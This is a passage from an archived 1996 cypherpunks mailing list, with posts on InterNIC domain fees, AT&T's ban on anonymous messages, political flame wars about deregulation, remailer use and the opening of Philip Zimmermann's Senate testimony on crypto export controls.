xvQQf+yGDLISXB1yVKUf0peuYSn6pmFw5pcftXbSE5hb5W1bkh7bUZs0nDt2AELa
n/Ao8rnVWqiopUheIqIxEmxJZc4X99mTMQMUD4yr7ieR7+YtIkawOU4pGTyGZawM
3D5TFQdLphOUF512qGIxGbbg8NsZaPeIF133kHGOmw==
=nVvT
- -----END PGP MESSAGE-----




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMc51q0jbHy8sKZitAQELJwMAubh35EvdnyJnRMb7aPS7SRiLuR5nZaFz
HNDM7YzwRJn+O9DFrrYiXSKGuGvQ4QPs3PRJ+UqbrbgNe6brXyMrMuHwRqELR+yI
uI4a2b4XBLGMVxutlznqYs221w7P3DSi
=/xkk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 25 Jun 1996 13:47:47 +0800
To: cypherpunks@toad.com
Subject: domain name zapping threat by Internic
Message-ID: <199606242105.OAA00824@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



surprising not to see any discussion on this here..

this is a very intersting development. all kinds of news reports
are talking about the internic zapping 25,000 DNS addresses.
I wonder how this will turn out.

I saw in an article a claim, I think, that the internic now charges
$100 "rent" per year for a domain. this is really amazing to me,
because this has totally changed from a one-time only fee, if correct.
is that correct?

I wonder if people are going to try to find a way to "route around"
this action by the internic... one wonders if this is just the first
in a series of actions by the new spook owners. (SAIC)  essentially,
if someone wanted to implement a tax or a way to control the internet,
the NIC would be an excellent place to start.

I wonder if the NIC has legal authority to yank DNS address like
they are doing. it seems one could take them to court and have
a pretty good argument that people who run DNS servers are free
to run them however they want, and that ultimately this is what
determines how routing on the internet is supported, not some
overseeing agency like the NIC.

it seems to me that now would be a brilliant time for someone
to introduce a "non NIC registration service" that sets up an
alternate DNS that guarantees that members will never be charged
money. of course that's what the DNS "sort of" started out as...

sigh.


Subject: Internic removing Domain names

The news media is anouncing that the Internic will delete 25,000 domain 
names that have not paid their registration fees Monday.  How will this 
work?  If someone is using one of these Domains and has DNS entries to 
find them what can the Internic do to disable the Domain? Won't the 
existing DNS services keep them working?

Glenn York





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 25 Jun 1996 13:11:34 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Noise: Re: Those Evil Republicans
In-Reply-To: <4qjndd$fnl@life.ai.mit.edu>
Message-ID: <31CEE31E.794B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:

> "They believe that the Government is the problem and that what everyone
> needs is to be told, 'You're on your own; go out there into the tender
> mercies of the global economy; have a great time in cyberspace, and we'll
> get out of your way.'" -- William Jefferson Blythe Clinton in a speech to
> the AFSCME in Chicago on Friday.

> I guess he doesn't want us to have fun in cyberspace -- though he didn't say
> so directly.

If you had heard the whole speech rather than only the portion reported on CNN
you would know that you have entirely distored the meaning. The point being
made was that cyberspace is being promoted as a panacea for all ills, many of
which it is creating rather than curing. Cyberspace is not a replacement for an
ecconomic policy, Newts idea of giving laptops to homeless people is not a
solution for poverty. Actually I think that this is quite obvious from the
quote you give.

Given the experience of derregulating Savings and Loans institutions I don't
think the country could survive another round of deregulation. As Reagan said
"Gentlemen we've hit the jackpot" - and of course they had, S&L was not a
fiasco for certain people, just for the poor taxpayers.


> In the same speech in which he talked about people hunting ducks with rifles.

Damned unsporting eh? Isn't the NRA weapon of choice a surface to air missile?


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HHendler@t-online.de (Horst Hendler)
Date: Tue, 25 Jun 1996 13:25:26 +0800
To: cypherpunks@toad.com
Subject: (Kein 'Betreff')
Message-ID: <31CF2011.7377@t-online.de>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 25 Jun 1996 14:17:17 +0800
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: Noise: Re: Those Evil Republicans
Message-ID: <2.2.32.19960624201317.0092cd94@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:49 PM 6/24/96 -0400, Hallam-Baker wrote:

>If you had heard the whole speech rather than only the portion reported on CNN

I read the reporting and excerpts in the Saturday Times.  

>you would know that you have entirely distored the meaning. The point being
>made was that cyberspace is being promoted as a panacea for all ills, many of
>which it is creating rather than curing. 

I wasn't aware of any ills being created by cyberspace.  For one thing, it
hasn't been around (as a big thing) long enough.  The only impact it has had
so far is to reduce TV watching and improve writing ability (from a very low
base level) among its heavy users.  That's a good thing.  Any effects of
disintermediation or shrinking of institutions (governments and
corporations) as we discuss on this list haven't really happened yet.

>Cyberspace is not a replacement for an
>ecconomic policy, Newts idea of giving laptops to homeless people is not a
>solution for poverty. Actually I think that this is quite obvious from the
>quote you give.

I assume that Clinton's statement was aimed at the neo-Luddites in the
AFSCME.  There are probably quite a few.  Actually freedom of communications
or free exchange of bits (cyberspace) and by analogy the free exchange of
goods and services *are* an economic policy though of course a controversial
one.

>Given the experience of derregulating Savings and Loans institutions I don't
>think the country could survive another round of deregulation. As Reagan said
>"Gentlemen we've hit the jackpot" - and of course they had, S&L was not a
>fiasco for certain people, just for the poor taxpayers.

Yes the great inventor of deposit insurance FDR has a lot to answer for.
But for his intervention, we taxpayers wouldn't have owed a dime for the S&L
collapse.

I expect quite a bit more de facto dereg as people become harder to control.
A mere desire to regulate others unaccompanied by the ability to do so is so
much noise. 

>> In the same speech in which he talked about people hunting ducks with rifles.

>Damned unsporting eh? Isn't the NRA weapon of choice a surface to air missile?

The NRA suggests shotguns.  A rifle is much more sporting than a shotgun for
assassinating quackers.  Hard to hit them with rifles (even harder with SAMs).

DCF

"If the Internet is so easy to control, how come my sysop can't even control
his little piece of it?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Tue, 25 Jun 1996 13:18:09 +0800
To: cypherpunks@toad.com
Subject: http:--www.spyzone.com-
Message-ID: <9606242017.AA02091@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



   [IMAGE]
   
   THIS IS NOT A GAME.
   
    You are entering
   Communication Control System's
   
   
   Spy Zone.
   
   
     _________________________________________________________________
   
   This is the real world of spy versus spy, corporate espionage,
   counter intelligence, surveillance,
   and ultra-high tech detection systems.
   The products, services and information
   contained in this site are designed to protect you,
   your business and anything that you consider valuable.
   
     _________________________________________________________________
   
   THIS MONTH'S KEY FACT
   "72% of all businesses who experience a major loss of information
   systems/data and have not made preparations for that loss go out of
   business within 24 months...prepare for disasters..this is definitely
   the Decade of Disasters"
   
   ENTER SPYZONE
   TOOLS AND TECHNIQUES, OPPORTUNITIES, FACTS, ABOUT SPY ZONE
   
   Copyright CCS INTERNATIONAL, INC. 1995
   Web Site Design By John Copen
   
   .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 25 Jun 1996 13:42:27 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <2.2.32.19960624201317.0092cd94@popserver.panix.com>
Message-ID: <9606242058.AA01765@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>I read the reporting and excerpts in the Saturday Times.  

The Times is a Rupert Murdoch paper and so the views you find tend to be those 
of Rupert Murdoch - the man who gave Newt a $3million bribe (oops advance 
payment). 

>I wasn't aware of any ills being created by cyberspace.  For one thing, it
>hasn't been around (as a big thing) long enough. 

It probably dosen't affect you but there have been losers, mainly people loosing 
their jobs in the banking, insurance and other sectors where administrative 
staff are being replaced by computer. Now in the long run this is a good thing, 
but in the short run it is bad for the people concerned.

> The only impact it has had
>so far is to reduce TV watching and improve writing ability (from a very low
>base level) among its heavy users.  That's a good thing.  Any effects of
>disintermediation or shrinking of institutions (governments and
>corporations) as we discuss on this list haven't really happened yet.

Actually shrinking of government is happening but not because of the net. We are 
currently seeing the effect of the first wave of PC technology. The federal 
government has been drastically cut in size but mainly through outsourcing and 
contracting, not through reduction in functions performed. 

The main limitations are social, not technological. Like many large 
organisations the government has an ossified beauracracy. There is a very strong 
disincentive against making any changes. The reward for inovation is likely to 
be blame for whatever bad things happen without any credit for anything good 
that happens. Plus you could find yourself in front of a congressional kangeroo 
court being charged with some partisan charge or other.

Disintermediation is something that is happening, you could go to the Whitehouse 
site and obtain the "official" press release direct from the source.


>Yes the great inventor of deposit insurance FDR has a lot to answer for.
>But for his intervention, we taxpayers wouldn't have owed a dime for the S&L
>collapse.

Remember why FDR invented deposit insurance? The worst depression in modern 
history was caused by the lack of deposit insurance. You have the option of 
investing in a bank that is not insured, there were no problems with the 
insurance scheme so long as the insurers were allowed to regulate their risk 
just like any other insurer does. The problem came when Reagan and his crew "hit 
the jackpot".


>>Damned unsporting eh? Isn't the NRA weapon of choice a surface to air missile?
>
>The NRA suggests shotguns.  A rifle is much more sporting than a shotgun for
>assassinating quackers.  Hard to hit them with rifles (even harder with SAMs).

Well if you are a bad shot you probably need to use a shotgun. But think of the 
advantages of using a steel bullet - no lead poisoning problems!

	Phill











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Tue, 25 Jun 1996 13:44:00 +0800
To: vznuri@netcom.com
Subject: Re: info assembly line, "flits" (long)
Message-ID: <1093009406.50185835@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri,vznuri@netcom.com writes:

> what the flit concept does is introduce a *context* to a bit.
> a bit has no "context".  where did a bit come from? the situation
> with information is that it always has a *context* and is tied
> with other information. (so in addition, I might like to suggest
> that "flits" can be "tied together" with each other).

To me, bits don't need context any more than atoms do.  Their whole beauty
(like atoms) is their simplicity.  You can build incredibly complex
structures (like jaguars) from the simplest of particles (or bits).

Negroponte's analogy begs the question of the physics of cyberspace.  They
are clearly different from the physics of the real world.  Imagine if you
lived in a world where objects could be duplicated extremely quickly,
cheaply, and perfectly.  You could send things around at the speed of light.
Nothing ever happens except by the action of a program.  What would be
valuable to you in this world (crypto-relevance)?  Why would you care about
"where" anything is?  Why would you bother to "move" something?

Putting aside the implementation problems with "flits", I don't think there
is any need to make cyberspace behave like the real world.  The best things
about cyberspace are the differences with the real world.  I agree we need to
work on the interfaces between worlds, but that doesn't equate to making them
the same. 

A major problem with your note is that it confuses the bit-atom level view of
the world with the document-jaguar level.  People don't have to interact with
bits any more than they have to deal with atoms.  The properties you are
seeking are at a higher level than bits and are already in early development
(OpenDoc and others).   The "information assembly line" is at this higher
level and does not require "flits".

Thanks for a provocative note.

--Jeff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 25 Jun 1996 13:36:08 +0800
To: cypherpunks@toad.com
Subject: Arms Export Report
Message-ID: <199606241754.RAA14356@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wash Post today reports on a new study of U.S. arms 
   export policy, presented to the White House on Friday, and 
   to be formally released next week. It primarily addresses 
   killing-type arms and proposes greater U.S. restraint 
   of export of advanced armaments rather than promotion to 
   buttress the defense industry. 
 
   One of its recommendations is to form all regulations 
   governing arms exports and intelligence-gathering into 
   "single, coherent framework." 
 
   If anyone has seen this report, does it address crypto 
   export? 
 
   A copy by E-mail or fax (to 212-799-4003) would be 
   appreciated. 
 
---------- 
 
   The Wash Post has a free (for now) Web site at: 
 
        http://www.washingtonpost.com 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 25 Jun 1996 12:54:08 +0800
To: cypherpunks@toad.com
Subject: "Building the 21st Century Enterprise"
Message-ID: <eDs2PD207w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I just got a piece of junk snail with these words on it. It's an ad for
"Financial Technology World Conference 1996". Highlight:

Luncheon Speaker, September 17, 12:30-1:30 pm
Dr. Nathaniel Borenstein
Chief Scientist
First Virtual Holdings, Inc
As Chief Scientist of First Vortual Holdings, Nathaniel Borenstein created
the first operational Internet payment system.

It includes his picture. What can I say... I wouldn't buy a falafel in the
street from this guy. :-)

The conference is run my Miller Freeman, (212) 615-2765.

I considered coming to heckle him, until I saw that this isn't even free:

CONFERENCE FEES
Fee is $795 per person...

I suppose the audience will be limited to the people willing to pay lots
of money to listen to Dr. Nathaniel.

Very amused,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Wed, 26 Jun 1996 06:09:06 +0800
To: "'cypherpunks@toad.com>
Subject: RE: AT&T bans anonymous messages
Message-ID: <01BB626F.7D26B040@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



fortunately there's still such a ting as freedom of choice: use another ISP.  There's no reason why ATT can't forbid anything they want on their service.

The problem is: what happens if there is no longer freedom of choice of ISP ... and: how is ATT going to KNOW WHO SENT WHAT anonymously ... aye, there's the insidious part of it ....
----------
From: 	WorldNet User[SMTP:anonymous-user@worldnet.att.net]
Sent: 	Monday, June 24, 1996 9:43 AM
To: 	cypherpunks@toad.com
Subject: 	AT&T bans anonymous messages

AT&T WorldNet service has banned the sending of anonymous email or
posting anonymously.

>From the "AT&T WorldNet Service Operating Policies":

		(i) Members may not post or transmit any message
		anonymously or under a false name. Members may
		not permit any other person (other than an agent
		acting on Member's behalf and subject to Member's
		supervision) to access the Service Member's
		account for any purpose.

The no anon rule even beat the no indecency rule, which is second:

		(ii) Members may not post or transmit any message
                which is libelous, defamatory or which discloses
                private or personal matters concerning any person.
                Members may not post or transmit any message,
                data, image or program which is indecent, obscene
                or pornographic. 

http://www.worldnet.att.net/care/terms/#oppol







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 25 Jun 1996 13:09:45 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606072345.AA04810@Etna.ai.mit.edu>
Message-ID: <Pine.BSF.3.91.960624220841.157A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 7 Jun 1996 hallam@Etna.ai.mit.edu wrote:

> I thought the list had probably got bored with this nonsense long
> ago.
>
 
Perhaps the first thing you've been right about in some time, *Dr.*.

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 25 Jun 1996 19:40:57 +0800
To: cypherpunks@toad.com
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <31CEE31E.794B@ai.mit.edu>
Message-ID: <Pine.3.89.9606250021.A7632-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 24 Jun 1996, Hallam-Baker wrote:

> Duncan Frissell wrote:
> 
> > "They believe that the Government is the problem and that what everyone
> > needs is to be told, 'You're on your own; go out there into the tender
> > mercies of the global economy; have a great time in cyberspace, and we'll
> > get out of your way.'" -- William Jefferson Blythe Clinton in a speech to
> > the AFSCME in Chicago on Friday.
> 
> > I guess he doesn't want us to have fun in cyberspace -- though he didn't say
> > so directly.
> 
> If you had heard the whole speech rather than only the portion reported on CNN
> you would know that you have entirely distored the meaning. The point being
> made was that cyberspace is being promoted as a panacea for all ills, many of
> which it is creating rather than curing. Cyberspace is not a replacement for an
> ecconomic policy, Newts idea of giving laptops to homeless people is not a
> solution for poverty. Actually I think that this is quite obvious from the
> quote you give.

Right, and I bet Clinton really believes what someone wrote for him to 
wax political on. :->

If Clinton really thinks that Cyberspace is the Second Coming, then 
explain to me CLIPPER's 1,2 and 3, Janet Reno, Dorothy Denning, the CDA, 
etc.

Exercising dominion over this medium for the excuse of protecting us from 
the bad guys is yet another lame excuse for tossing out what little 
freedoms we have allowed to be legislated away. The mere fact, that 
cryptography is considered a hinderance to "protecting the citizenry" by 
this administration is tantamount to declaring war on personal privacy.

When his legislative efforts actually fall in line with believable 
rhetoric, then maybe I'll pay more attention. Up to date, he has 
demonstrated his true character, or lack thereof, between what he says 
and what he and his Clintonistas do.

> 
> Given the experience of derregulating Savings and Loans institutions I don't
> think the country could survive another round of deregulation. As Reagan said
> "Gentlemen we've hit the jackpot" - and of course they had, S&L was not a
> fiasco for certain people, just for the poor taxpayers.
> 
> 

This presumes that Cyberspace is regulated to begin with. I have yet to 
see anyone apply a litmus test that equally covers all jurisdictions and 
geopolitical climes. Last time I looked, Cyberspace was more "west of the 
Pecos" than any other communications medium that is generally available - 
which IMO is one of the last places that the first amendment actually 
still applies.

As for surviving deregulation, I would be more worried about the coming 
stock market crash and the devaluation of the worthless currency we carry 
in our pockets. Industry comes and goes with changes in technology, and 
the legal system continues on in the never ending effort to block 
progress and prop up self-serving ends.

10 years from now, many of the "regulated" industries we hold dear may 
not even exist in recognizable form.

> > In the same speech in which he talked about people hunting ducks with rifles.
> 
> Damned unsporting eh? Isn't the NRA weapon of choice a surface to air missile?
> 
> 
> 		Phill
> 

...Paul

"By the way, a new world record was set today in the 200 meter 
dash...Hillary heard a knock at the door and thought there was a
Subpoena waiting..." 

		Jay Leno, 6-24-96





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Tue, 25 Jun 1996 16:00:39 +0800
To: cypherpunks@toad.com
Subject: [Even More Noise]: Re: Those Evil Republicans
In-Reply-To: <4qjndd$fnl@life.ai.mit.edu>
Message-ID: <19960625022540.30059.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker writes:

 > Given the experience of deregulating Savings and Loans institutions
 > I don't think the country could survive another round of
 > deregulation.

I get really tired of shallow critics of deregulation citing the S&L
problem.  The problem was partial deregulation -- the wolves were let
go: into the sheep's pen.  The S&L's were allowed to make risky
investments, but the American taxpayers still guaranteed their asses.

Phil, your reputation is sinking fast.  I suggest silence on your part.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | Corporations persuade;
Potsdam, NY 13676       | +1 315 268 9201 FAX   | governments coerce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Tue, 25 Jun 1996 22:11:36 +0800
To: cypherpunks@toad.com
Subject: Re: The Reno Text URL.....
Message-ID: <2.2.16.19960625103720.243fc176@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


The URL for the Reno Address is:

http://pwp.usa.pipeline.com/~jwa/addres.txt

Thanks to John Young for the KEWL website.
Check out some of the other stuff in it too!

Love Always,

Carol Anne

At 04:21 AM 6/24/96 -0700, you wrote:

>I'd like to read it, but you didn't include the url, and the article
>you followed up seems to have expired out of my news spool.
>
>Mind telling me where the text is?
>
>-jcr
>
>
Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 25 Jun 1996 17:25:29 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606250516.HAA04288@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


How do I use the Encrypt-Key: header to include a reply block
in an anonymous posting? I've tried for a few days now, and
I can't seem to make it work.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 26 Jun 1996 05:40:28 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <31CEC5B3.7C19@worldnet.att.net>
Message-ID: <199606251435.HAA05846@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


WorldNet User <anonymous-user@worldnet.att.net> writes:
>>From the "AT&T WorldNet Service Operating Policies":
>		(i) Members may not post or transmit any message
>		anonymously or under a false name. Members may
>		not permit any other person (other than an agent
>		acting on Member's behalf and subject to Member's
>		supervision) to access the Service Member's
>		account for any purpose.

(I can't get through to http://www.worldnet.att.net this morning.  Makes
me appreciate that dial tone I get every day.)

Is the WorldNet service an Internet access account, providing dial-in
SLIP or PPP access?  Or does it also provide user accounts like shell
accounts or like AOL?

The wording of this restriction is a bit ambiguous.  Technically if I
choose to resend someone else's mail I am not transmitting it anonymously
or under a false name, especially if I make clear what I have done.
He is anonymous, not I.

Rather, if I want to post a message anonymously I must access an
anonymous remailer to do so; if I want to post under a false name I must
hack my message headers or connect to someone else's news or mail server
and supply false data.

Doing the latter is something of a violation of the Internet rules, such
as they are, so I could see forbidding it, but forbidding use of an
anonymous remailer on someone else's system seems unreasonable.  AT&T
should not try to control what Internet services I access.

If I run an anonymous remailer on my home PC, connecting to WorldNet to
download the mail, decrypt it, scramble it, and re-send it under my name
but with a disclaimer attached telling what I have done, I have not
posted or transmitted anything anonymously or under a false name.  The
source of the material I choose to transmit, as long as it is legal, is
not something under AT&T's control.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Wed, 26 Jun 1996 00:24:12 +0800
To: cypherpunks@toad.com
Subject: PhillNoise: Re: Those Evil Republicans
Message-ID: <199606251200.IAA27793@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


"Dr." Hallam-Baker <hallam@ai.mit.edu>
 ["but I don't think that I would ever let him cut on me." - sorry Jimmy]
opined:

.....

>Newts idea of giving laptops to homeless people is not a
>solution for poverty.

Agreed, any more than is Willie's subsidizing illegitimacy, despite his oft-
proven love for sex-without-responsibility.

>
>Given the experience of derregulating Savings and Loans institutions I don't
>think the country could survive another round of deregulation.

This is so moronic it could only come from Hallam. For you, "deregulation"
means doubling the government's liability, as happened when that space-
cadet (really!) Garn and that crook Fernand St. Germain raised the payout
from 50 to 100 thousand. Yeah, Phill, that really deregulated 'em...

>As Reagan said
>"Gentlemen we've hit the jackpot" - and of course they had, S&L was not a
>fiasco for certain people, just for the poor taxpayers.

Certainly not for that crook Cranston, either. There's a reason 4 of the
Keating 5 were Democrats, Phill. They were and are even more for sale than
the Republicans. Political history, even recent, isn't your strong suit,
and your pity for taxpayers is touching, if a bit recent.
anon.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Wed, 26 Jun 1996 06:51:09 +0800
To: vznuri@netcom.com
Subject: Re: domain name zapping threat by Internic
Message-ID: <199606251505.IAA22490@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: shifter@portal.stwing.upenn.edu, vznuri@netcom.com,
 cypherpunks@toad.com
Date: Tue Jun 25 10:05:06 1996
The policy implemented about 10 months ago was for a $100 fee to register 
new domain names.  This was good for two years.  Current domain holders 
were to be billed $50 each year to maintain their domain names.  The 
billings for the current domain name holders are now just beginning to be 
sent.


> > I saw in an article a claim, I think, that the internic now charges
> > $100 "rent" per year for a domain. this is really amazing to me,
> > because this has totally changed from a one-time only fee, if
>  correct.
> > is that correct?
> 
> There was never a "one-time" fee.  You could register as many domains
>  as
> you wanted whenever you wanted (as long as you weren't violating a 
> trademark or something like that).  Usually people with domains would
>  run 
> into charges because they needed someone else (usually an ISP) to run
> authoritative nameservers for their domain.
> 
> > 
> > I wonder if people are going to try to find a way to "route around"
> > this action by the internic... one wonders if this is just the first
> > in a series of actions by the new spook owners. (SAIC)  essentially,
> > if someone wanted to implement a tax or a way to control the internet,
> > the NIC would be an excellent place to start.
> > 
> > I wonder if the NIC has legal authority to yank DNS address like
> > they are doing. it seems one could take them to court and have
> > a pretty good argument that people who run DNS servers are free
> > to run them however they want, and that ultimately this is what
> > determines how routing on the internet is supported, not some
> > overseeing agency like the NIC.
> 
> Nothing stops anyone from running their own name server.  However, the
>  root
> servers are what 99% of the nameservers out there point at.  No one is
>  going
> to use dns.joe.schmoe.org as their primary nameserver.
> 
> 
> > 
> > it seems to me that now would be a brilliant time for someone
> > to introduce a "non NIC registration service" that sets up an
> > alternate DNS that guarantees that members will never be charged
> > money. of course that's what the DNS "sort of" started out as...
> 
> And then there could be competition, which could potentially create
>  some
> bad scenarios.  What if one registration service refused to propagate
>  their
> domains to other registration services?
> 
> -- 
> 
> Shifter
> shifter@portal.stwing.upenn.edu
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMdAATctPRTNbb5z9AQFEBwf/choEdkykN2+DGEBWGAUsD2uuk++cWqff
v2Kc9Kks7PmihspD7iq5X0l64a5ly2oYGk6aG/dKIr+rHnc+G3Nsd/LeczdTwfku
7iRLjWFNzq720m/XSkia4ho03+jFd090azKKqJb4w5sIu3n3xVSJRLczO8ofIsZg
gsk9QjcGfA2ZJlcIsgi4NMyaGSTtM7rdGfNafQ7CXFBfjlOlv+wfe/7Kpz/dLZZD
Ex7TS8Fgr2CA515F+6e3CkROKesn0EXLn087WTkwbNIWsreaJy4EPJxOXbz+KDN+
SuRfvKpQNSgHC0Q+m6JAuZnxLZcU1lZNSe7+DItAz7k0gwzgJVx80Q==
=W4NF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 26 Jun 1996 06:16:42 +0800
To: cypherpunks@toad.com
Subject: Re: Noise: Re: Those Evil Republicans
Message-ID: <199606251523.IAA04107@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:58 PM 6/24/96 -0400, hallam@Etna.ai.mit.edu wrote:
> Remember why FDR invented deposit insurance? The worst depression in modern 
> history was caused by the lack of deposit insurance. 

By an interesting coincidence the the worst depression in modern history
happened
shortly after governments around the world took control of currency issue, so
that banknotes became government notes.

Just as the worst famine in modern Russian history happened shortly after the
government collectivized the peasants.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 26 Jun 1996 03:25:29 +0800
To: cypherpunks@toad.com
Subject: I am looking to hire a crypto person....
Message-ID: <v03007401adf5a5188a3b@[204.246.66.57]>
MIME-Version: 1.0
Content-Type: text/plain


I am looking to hire someone part-time (with potential to upgrade to
full-time) to work for Counterpane Systems, doing cryptography consulting
for a variety of clients.

The work is in analysis and design, mostly of cryptographic and security
systems.  Think of SSL, SPKI, PGP... that sort of thing.  There isn't a
whole lot of math, just critical thinking, complete analysis, and good
writing.

If anyone is interested, please send me mail.  (Depending on the number of
responses received, I may have some kind of application test.)

Bruce

************************************************************************
* Bruce Schneier            2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems       000,000,000,000,000,000,002,000,000,002,293
* schneier@counterpane.com  The last prime number...alphabetically!
* (612) 823-1098            Two vigintillion, two undecillion, two
* 101 E Minnehaha Pkwy      trillion, two thousand, two hundred and
* Minneapolis, MN  55419    ninety three.
************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@ACM.ORG>
Date: Wed, 26 Jun 1996 09:00:14 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Zimmermann's Senate testimony
Message-ID: <199606251539.PAA01255@maalox>
MIME-Version: 1.0
Content-Type: text


Testimony of Philip R. Zimmermann to
the Subcommittee on Science, Technology, and Space
of the US Senate Committee on Commerce, Science, and 
Transportation
26 June 1996


Mr. Chairman and members of the committee, my name is Philip 
Zimmermann, and I'm Chairman and Chief Technology Officer for PGP 
Inc, a newly-formed company that provides cryptographic products.  
I'm here to talk to you today about S.1726 and the need to change 
US export control policy for cryptographic software.  I want to 
thank you for the opportunity to be here to speak in favor of this 
bill.

I'm the creator of PGP (Pretty Good Privacy), a public-key 
encryption software package for the protection of electronic mail.  
Since PGP was published domestically as freeware in June of 1991, 
it has spread organically all over the world, and has since become 
the de facto worldwide standard for encryption of E-mail, winning 
numerous industry awards along the way.  For three years I was the 
target of a criminal investigation by the US Customs Service, who 
assumed that laws were broken when PGP spread outside the US.  
That investigation was closed without indictment in January 1996.



Computers were developed in secret back in World War II mainly to 
break codes.  Ordinary people did not have access to computers, 
because they were few in number and too expensive.  Some people 
postulated that there would never be a need for more than half a 
